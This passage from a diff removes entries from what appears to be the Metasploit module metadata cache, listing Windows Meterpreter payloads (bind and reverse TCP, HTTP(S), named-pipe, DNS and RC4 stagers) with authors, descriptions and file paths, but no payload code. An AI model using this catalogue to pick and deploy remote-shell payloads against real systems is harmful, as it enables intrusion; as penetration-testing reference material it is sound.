null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/meterpreter/bind_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/meterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/meterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/meterpreter/find_tag": { - "name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/meterpreter/reverse_http": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/meterpreter/reverse_http_proxy_pstore": { - "name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy", - "fullname": "payload/windows/meterpreter/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/meterpreter/reverse_https": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/windows/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_https" - }, - "payload_windows/meterpreter/reverse_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/meterpreter/reverse_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/meterpreter/reverse_nonx_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/meterpreter/reverse_ord_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "spoonm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/meterpreter/reverse_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager", - "fullname": "payload/windows/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/meterpreter/reverse_tcp_allports": { - "name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/meterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/meterpreter/reverse_tcp_dns": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)", - "fullname": "payload/windows/meterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/meterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/meterpreter/reverse_tcp_rc4_dns": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/meterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/meterpreter/reverse_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/meterpreter/reverse_winhttp": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/meterpreter/reverse_winhttps": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_windows/meterpreter_bind_named_pipe": { - "name": "Windows Meterpreter Shell, Bind Named Pipe Inline", - "fullname": "payload/windows/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_bind_tcp": { - "name": "Windows Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/windows/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_http": { - "name": "Windows Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/windows/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_https": { - "name": "Windows Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/windows/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_ipv6_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/windows/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter_reverse_tcp": { - "name": "Windows Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/windows/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "OJ Reeves", - "sf " - ], - "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/metsvc_bind_tcp": { - "name": "Windows Meterpreter Service, Bind TCP", - "fullname": "payload/windows/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/metsvc_reverse_tcp": { - "name": "Windows Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/windows/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb", - "is_install_path": true, - 